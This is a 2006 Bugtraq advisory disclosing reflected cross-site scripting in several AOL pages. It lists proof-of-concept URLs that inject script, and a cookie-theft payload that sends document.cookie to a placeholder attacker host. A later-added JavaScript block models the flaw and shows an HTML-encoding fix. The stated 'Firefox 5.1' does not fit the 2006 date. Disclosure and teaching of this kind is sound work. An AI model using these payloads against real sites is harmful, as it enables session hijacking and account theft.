Message-ID: <3979.68.20.178.120.1136691905.squirrel@www.morx.org>
Date: Sun, 8 Jan 2006 03:45:05 -0000 (GMT)
From: simo@...x.org
To: bugtraq@...urityfocus.com
Subject: AOL Multiple Cross Site Scripting Vulnerability


Title: AOL Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AOL.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Tested on: Microsoft IE 6.0 and Firefox 5.1

Details:

The affected AOL.com pages are AOLserver Dynamic Pages (ADP). ADP is a set
of web server extensions for generating documents dynamically: AOLserver
runs a set of Tcl code with the arguments supplied by the user in the
request and returns the resulting document. The model is similar to
Microsoft's Active Server Pages. The ADP scripts listed below are prone to
reflected cross-site scripting because the applications fail to properly
sanitize (or HTML-encode on output) user-supplied query parameters before
placing them in the page.

Impact:

An attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authenticated AIM user, in the context
of the affected AIM web page. This allows theft of the cookie-based
authentication credentials, giving the attacker temporary access to the
victim's account (mailbox, etc.), and enables other attacks such as forcing
the victim to re-login on an attacker-controlled form.

Screen captures:

http://www.morx.org/AOL-XSS.JPG
http://www.morx.org/AOL2-XSS.JPG

Affected scripts with proof-of-concept URLs:

http://peopleconnection.aol.com/dirmodule.adp?_did=55004"><script>alert('VULNERABLE')</script>&_dtype=csv&_dcookie=1&_dpath=pc_main,pc_main&_dsect=1#

http://health.aol.com/dirmodule.adp?_did=41623"><script>alert('VULNERABLE')</script>&_dtype=csv&_dcookie=0&_dpath=hlth_talk,hlth_talk&_dsect=1&dirHeader=Health%20Talk%20Directory#

http://health.aol.com/dirmodule.adp?_did=41623"><img%20src="http://www.morx.org/morx.png"%20</src>&_dtype=csv&_dcookie=0&_dpath=hlth_talk,hlth_talk&_dsect=1&dirHeader=Health%20Talk%20Directory#


http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert('VULNERABLE')</script>

http://aolexpressions.aol.com/main.adp?expTypeId=1"><script>alert('VULNERABLE')</script>&clientId=2

http://aolexpressions.aol.com/search.adp?clientId=2&search=<script>alert('VULNERABLE')</script>

http://food.aol.com/food/recipefinder.dyn?action=howItWorks"><script>alert('VULNERABLE')</script>

Example of cookie theft:

http://aolexpressions.aol.com/search.adp?clientId=2&search=<script>document.location='http://www.some-attacker-site/grab.php?cookie='+escape(document.cookie).substr(0,1900)</script>
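The breakout used by the proof-of-concept URLs above (a double quote in a
query parameter closes the attribute it is reflected into, and what follows
is parsed as markup) can be modelled in a few lines. The block below is an
added example, not code from this advisory or from AOL's ADP pages: the
page and parameter names follow dirmodule.adp?_did=..., but the attribute
template the server writes the value into is assumed, since the real ADP
source is not shown. It contrasts the unsanitized reflection described in
the Details section with the hardened, HTML-encoded form.

```javascript
// Added example, not code from the advisory or from AOL: a minimal model of
// the reflected XSS described above. A server-side handler echoes the _did
// query parameter into a quoted HTML attribute without output encoding, so a
// value containing a double quote closes the attribute and the remainder of
// the input is parsed as markup. The hardened handler HTML-encodes the value.
// The page and parameter names follow the advisory's dirmodule.adp?_did=...;
// the attribute template itself is assumed (the real ADP source is unknown).

// Proof-of-concept URL quoted verbatim from the advisory.
const POC_URL =
  'http://peopleconnection.aol.com/dirmodule.adp?_did=55004"><script>alert(\'VULNERABLE\')</script>&_dtype=csv&_dcookie=1&_dpath=pc_main,pc_main&_dsect=1#';

// The decoded attacker-controlled value the server sees for _did.
const POC_DID = '55004"><script>alert(\'VULNERABLE\')</script>';

// Read _did the way a server framework would: WHATWG URL parsing
// percent-decodes the query, so %20, %22 etc. come back as raw characters.
function getDid(requestUrl) {
  const v = new URL(requestUrl).searchParams.get('_did');
  return v === null ? '' : v;
}

// Vulnerable: the raw parameter is interpolated into an attribute value.
function renderVulnerable(did) {
  return `<input type="hidden" name="_did" value="${did}">`;
}

// Hardened: encode the characters that can terminate a quoted attribute or
// start a tag. Always pair this with a quoted attribute.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderHardened(did) {
  return `<input type="hidden" name="_did" value="${htmlEncode(did)}">`;
}

// Rough check for what the browser would see: the names of every tag that
// starts with a literal '<' in the output. An injected element shows up
// here; an encoded one does not.
function tagNames(html) {
  const names = [];
  const re = /<\/?([A-Za-z][\w-]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Stand-alone demonstration.
const did = getDid(POC_URL);
console.log('decoded _did :', did);
console.log('vulnerable   :', renderVulnerable(did), tagNames(renderVulnerable(did)));
console.log('hardened     :', renderHardened(did), tagNames(renderHardened(did)));
```

The vulnerable output yields an extra `<script>` element; the hardened
output stays a single `<input>` with the payload inert inside the attribute.
Note that the cookie-theft payload above reads `document.cookie`, so a
session cookie flagged HttpOnly is not exposed to it in browsers that honour
the flag; the script still runs in the page's origin and can act on the
victim's behalf.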

Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/account. I cannot be held responsible for
any of the above.

